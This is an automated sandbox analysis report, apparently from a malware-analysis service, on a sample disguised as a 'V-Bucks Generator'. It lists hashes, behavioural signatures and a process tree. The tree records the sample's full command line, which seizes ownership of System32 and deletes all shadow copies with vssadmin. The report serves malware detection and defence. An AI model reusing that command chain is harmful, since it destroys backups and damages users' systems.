Analysis
max time kernel: 21s
max time network: 19s
platform: windows10-2004_x64
resource: win10v2004-20240802-en
resource tags: arch:x64, arch:x86, image:win10v2004-20240802-en, locale:en-us, os:windows10-2004-x64, system
submitted: 14-08-2024 12:09
Static task: static1
Behavioral task: behavioral1
  Sample: V-Bucks Generator.exe
  Resource: win7-20240704-en
Behavioral task: behavioral2
  Sample: V-Bucks Generator.exe
  Resource: win10v2004-20240802-en
General
Target: V-Bucks Generator.exe
Size: 458KB
MD5: d5e63bc0a087c9cda1215688405b6fb2
SHA1: e32d08d66878bf50458cd8674dfc581a6fc611d4
SHA256: 9bf2689546105532a778dc6a0a6e964ece8ff33c4fcea28e82c29940e06d2666
SHA512: cdc9610af7562bca20bb29a14b7acb0facef90f15b21ad4d0006e5dc2afc9533cd406c7735dcc9c1e353cc04ff4b480d7d0229be59e2b0e51ed91bbef4298f12
SSDEEP: 12288:QGchrYmYRz1T/I/x/c/Qkrn5gA6IG+rQFR:SrqJT/Cw5gA6Iy
Malware Config
Signatures
- Deletes shadow copies (3 TTPs)
  Ransomware often targets backup files to inhibit system recovery.

- Possible privilege escalation attempt (4 IoCs)
  Processes:
    pid   process
    4080  takeown.exe
    2784  icacls.exe
    4952  takeown.exe
    4932  icacls.exe

- Checks computer location settings (2 TTPs, 1 IoC)
  Looks up country code configured in the registry, likely geofence.
  Processes:
    description        ioc                                                                                                process
    Key value queried  \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Control Panel\International\Geo\Nation  V-Bucks Generator.exe

- Modifies file permissions (1 TTP, 4 IoCs)
  Processes:
    pid   process
    4932  icacls.exe
    4080  takeown.exe
    2784  icacls.exe
    4952  takeown.exe

- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).

- Interacts with shadow copies (3 TTPs, 1 IoC)
  Shadow copies are often targeted by ransomware to inhibit system recovery.
  Processes:
    pid   process
    5056  vssadmin.exe

- Suspicious use of AdjustPrivilegeToken (5 IoCs)
  Processes:
    description                      pid   process
    Token: SeTakeOwnershipPrivilege  4952  takeown.exe
    Token: SeTakeOwnershipPrivilege  4080  takeown.exe
    Token: SeBackupPrivilege         956   vssvc.exe
    Token: SeRestorePrivilege        956   vssvc.exe
    Token: SeAuditPrivilege          956   vssvc.exe

- Suspicious use of WriteProcessMemory (12 IoCs)
  Processes:
    description                        pid   process                target process
    PID 4536 wrote to memory of 2300   4536  V-Bucks Generator.exe  cmd.exe
    PID 4536 wrote to memory of 2300   4536  V-Bucks Generator.exe  cmd.exe
    PID 2300 wrote to memory of 4952   2300  cmd.exe                takeown.exe
    PID 2300 wrote to memory of 4952   2300  cmd.exe                takeown.exe
    PID 2300 wrote to memory of 4932   2300  cmd.exe                icacls.exe
    PID 2300 wrote to memory of 4932   2300  cmd.exe                icacls.exe
    PID 2300 wrote to memory of 4080   2300  cmd.exe                takeown.exe
    PID 2300 wrote to memory of 4080   2300  cmd.exe                takeown.exe
    PID 2300 wrote to memory of 2784   2300  cmd.exe                icacls.exe
    PID 2300 wrote to memory of 2784   2300  cmd.exe                icacls.exe
    PID 2300 wrote to memory of 5056   2300  cmd.exe                vssadmin.exe
    PID 2300 wrote to memory of 5056   2300  cmd.exe                vssadmin.exe

- Uses Volume Shadow Copy service COM API
  The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
[1] C:\Users\Admin\AppData\Local\Temp\V-Bucks Generator.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\V-Bucks Generator.exe"
    Signatures:
    - Checks computer location settings
    - Suspicious use of WriteProcessMemory
    PID: 4536

    [2] C:\Windows\System32\cmd.exe
        Command line: "C:\Windows\System32\cmd.exe" /c color 47 && title Critical process && takeown /f C:\Windows\System32 && icacls C:\Windows\System32 /grant %username%:F && takeown /f C:\Windows\System32\drivers && icacls C:\Windows\System32\drivers /grant %username%:F && vssadmin delete shadows /all /quiet && Exit
        Signatures:
        - Suspicious use of WriteProcessMemory
        PID: 2300

        [3] C:\Windows\system32\takeown.exe
            Command line: takeown /f C:\Windows\System32
            Signatures:
            - Possible privilege escalation attempt
            - Modifies file permissions
            - Suspicious use of AdjustPrivilegeToken
            PID: 4952

        [3] C:\Windows\system32\icacls.exe
            Command line: icacls C:\Windows\System32 /grant Admin:F
            Signatures:
            - Possible privilege escalation attempt
            - Modifies file permissions
            PID: 4932

        [3] C:\Windows\system32\takeown.exe
            Command line: takeown /f C:\Windows\System32\drivers
            Signatures:
            - Possible privilege escalation attempt
            - Modifies file permissions
            - Suspicious use of AdjustPrivilegeToken
            PID: 4080

        [3] C:\Windows\system32\icacls.exe
            Command line: icacls C:\Windows\System32\drivers /grant Admin:F
            Signatures:
            - Possible privilege escalation attempt
            - Modifies file permissions
            PID: 2784

        [3] C:\Windows\system32\vssadmin.exe
            Command line: vssadmin delete shadows /all /quiet
            Signatures:
            - Interacts with shadow copies
            PID: 5056

[1] C:\Windows\system32\vssvc.exe
    Command line: C:\Windows\system32\vssvc.exe
    Signatures:
    - Suspicious use of AdjustPrivilegeToken
    PID: 956